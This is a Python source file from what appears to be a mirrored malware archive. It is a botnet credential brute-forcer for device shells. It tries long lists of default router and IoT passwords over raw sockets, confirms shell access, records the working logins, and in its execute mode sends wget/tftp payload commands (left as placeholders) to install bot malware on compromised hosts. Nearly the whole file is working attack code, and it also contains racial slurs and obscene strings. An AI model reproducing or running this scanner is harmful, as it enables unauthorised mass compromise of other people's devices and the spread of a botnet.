Mirrors
/
TL-BOTS
mirror of https://github.com/threatland/TL-BOTS
6
0
Fork 0
Code Issues Projects Releases Wiki Activity
TL-BOTS/TL.EXPLOIT_SCAN/SCANNER.Generic.SSH/dragonballfuck.py

201 lines
11 KiB
Python
Raw Permalink Blame History

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, socket, sys, time, threading, StringIO, argparse, random
jackmeoff = random.choice(["see nudes of R00tGod"])
raw_input('Press <ENTER> to '+jackmeoff)
print "\n"
print "▀█████████▄ ███ █▄ ▄███████▄ ▄██ ▄ ▀█████████▄ ▄██████▄ ▀████ ▐████▀ "
print " ███ ███ ███ ███ ██▀ ▄██ ███ ██▄ ███ ███ ███ ███ ███▌ ████▀ "
print " ███ ███ ███ ███ ▄███▀ ███▄▄▄███ ███ ███ ███ ███ ███ ▐███ "
print " ▄███▄▄▄██▀ ███ ███ ▀█▀▄███▀▄▄ ▀▀▀▀▀▀███ ▄███▄▄▄██▀ ███ ███ ▀███▄███▀ "
print "▀▀███▀▀▀██▄ ███ ███ ▄███▀ ▀ ▄██ ███ ▀▀███▀▀▀██▄ ███ ███ ████▀██▄ "
print " ███ ██▄ ███ ███ ▄███▀ ███ ███ ███ ██▄ ███ ███ ▐███ ▀███ "
print " ███ ███ ███ ███ ███▄ ▄█ ███ ███ ███ ███ ███ ███ ▄███ ███▄ "
print "▄█████████▀ ████████▀ ▀████████▀ ▀█████▀ ▄█████████▀ ▀██████▀ ████ ███▄ "
print "\n"
parser = argparse.ArgumentParser()
parser.add_argument("-b","--brute",type=str, help="Brute force from list of IPs")
parser.add_argument("-x","--execute",type=str, help="Execute using wget/tftp from list of IPs+user+pass")
parser.add_argument("output",type=str,help="Output filename")
parser.add_argument("threadcount",type=int,help="The number of threads to use")
args=parser.parse_args()
tpayload = "TFTPAYLOAD"
wpayload = "WGETPAYLOAD"
payload = tpayload+"\r\n"+wpayload+'\r\n'
Thread = threading.Thread
userlist = ['root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor', 'security', '', 'security', 'storwatch', '', 'specialist', 'super', '', '5777364', 'superadmin', '', 'secret', 'superman', '', '21241036', 'support', '', 'support', 'tech', '', 'tech', 'technician', '', 'T!m3W4rn3rC4bl3', 'test', '', 'test', 'ubnt', '', 'ubnt', 'UN', '', 'unknown', 'user', '', 'user', 'volition', '', 'volition', 'vt100', '', 'public', 'VTech', '', 'VTech']
passlist = [ 'root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor']
thread_cnt = args.threadcount
if args.brute: read_h = open(str(args.brute),'a+')
niggers420 = ''
def sock_read_until(tn, criteria, timeout=30):
shitbuffer = ''
start_time = time.time()
while time.time() - start_time < timeout:
shitbuffer += tn.recv(40960)
time.sleep(0.01)
if criteria in shitbuffer: return shitbuffer
raise Exception('sock_read_until \x1b[1;33m timeout \x1b[ 0m')
def iac_wont(tn, feature):
# print 'wont',feature
tn.send("\xff\xfb"+chr(feature))
def iac_dont(tn, feature):
# print 'dont',feature
tn.send("\xff\xfe"+chr(feature))
def mass_check(read_h):
try:
for line in open(read_h).readlines():
ip_info = line.split(":")
e = Thread(target=f, args=(ip_info[0],))
e.start()
print threading.active_count()
while threading.active_count() > thread_cnt:
pass
except KeyboardInterrupt: os.kill(os.getpid(),9)
def mass_pwn(targets_file):
try:
targets_file_h = open(targets_file).readlines()
for line in targets_file_h:
ip_info = line.split(":")
try:
e = Thread(target=loadem, args=(ip_info[0],ip_info[1],ip_info[2]))
e.start()
except: pass
print '[Thread]: ',threading.active_count()
while threading.active_count() > thread_cnt:
# time.sleep(0.5)
pass
except KeyboardInterrupt: os.kill(os.getpid(),9)
def loadem(HOST,user,password):
host = HOST
try:
x = ''
tn = socket.socket()
tn.connect((HOST,22))
# print "Connected to "+HOST
print tn.recv(40960)
tn.send(user + "\n")
time.sleep(1)
print sock_read_until(tn,":",10)
tn.send(password + "\n")
print "Spraying "+HOST
tn.send("sh\r\n\r\n")
time.sleep(0.01)
tn.send("shell\r\n\r\n")
time.sleep(0.01)
x += sock_read_until(tn,"#",10)
print '[+] Got shell! '+HOST
if ('rong' in x) or ('nvalid' in x) or ('ncorrect' in x) or ('again' in x) or ('denied' in x) or ('bad' in x) or ('Bad' in x) or ('failed' in x) or ('ailure' in x) or ('connection closed by' in x) or ('User not exist' in x) or ('nformation incomplete' in x): raise Exception('fucked')
for line in payload.split("\n"):
# print 'Sending line '+line
tn.send(line+'\r\n')
x = tn.recv(40960)
if '> ' in x: raise Exception # because fuck those.
# print x
try: arch = sock_read_until(tn,"#",3)
except: arch = 'dicks'
print arch
return arch
except: pass
def f(ip):
ip = ip.rstrip()
iac_wont_b = 0
iac_dont_b = 0
for user in userlist:
for passw in passlist:
x = ''
try:
tn = socket.socket()
tn.settimeout(35)
tn.connect((ip,22))
except Exception as e:
print "\x1b[1;31m[x] Failed: \x1b[0m", ip, e
break
else:
try:
x += tn.recv(40960)
except Exception as e:
print "\x1b[1;33m[x] Timeout: \x1b[0m", ip,e
break
else:
try:
niggers420=''
time.sleep(0.1)
x += tn.recv(40960)
sio = StringIO.StringIO(x)
try:
for i in sio.read(15):
# print str(ord(i))
if ord(i) == 251: # IAC WILL
iac_dont_b = 1
elif ord(i) == 253: # IAC DO
# print 'set wont b'
iac_wont_b = 1
elif iac_wont_b == 1:
iac_wont(tn,ord(i))
iac_wont_b = 0
elif iac_dont_b == 1:
iac_dont(tn,ord(i))
iac_dont_b = 0
except: print "IAC wtf?"
# print 'iac done!'
tn.send(user + "\r\n")
time.sleep(0.01)
if 'User Access Verification' in x: raise Exception('cisco dicks')
x += sock_read_until(tn,":")
if 'ogin:' not in x and 'sername:' not in x: raise Exception('no login?')
tn.send(passw + "\r\n\r\n")
x += tn.recv(409600)
tn.send("sh\r\n\r\n")
time.sleep(0.01)
tn.send("shell\r\n\r\n")
time.sleep(0.01)
sock_read_until(tn,"#")
tn.send("echo -e '\\x62\\x69\\x6e\\x66\\x61\\x67\\x74'\r\n\r\n")
time.sleep(0.01)
x += tn.recv(409600)
time.sleep(0.01)
try:
x += sock_read_until(tn,"binfagt")
# print x
# if 'Welcome to ZTE' in x: raise Exception('ZTE')
if 'binfagt' not in x: raise Exception('no binfagt')
if '#' not in x and '>' not in x and '%' not in x and '$' not in x and ':' not in x: raise Exception('no prompt')
if ('rong' in x) or ('nvalid' in x) or ('ncorrect' in x) or ('again' in x) or ('denied' in x) or ('bad' in x) or ('Bad' in x) or ('failed' in x) or ('ailure' in x) or ('connection closed by' in x) or ('User not exist' in x) or ('nformation incomplete' in x): raise Exception('fucked')
except Exception as e:
print "[failed execution]", e,ip.rstrip()
continue
else:
file_h = open(args.output,'a+')
file_h.write(ip.rstrip() + ":" + user + ":" + passw+'\n')
file_h.close()
print '\x1b[1;32m[*] Execution on: \x1b[0m ', ip
break
except Exception as e:
# print "Timeout: ", ip, e
continue
continue
continue
continue
return "my nutsack"
#p.join()
if args.execute:
mass_pwn(args.execute)
elif args.brute: mass_check(args.brute)
Reference in New Issue View Git Blame Copy Permalink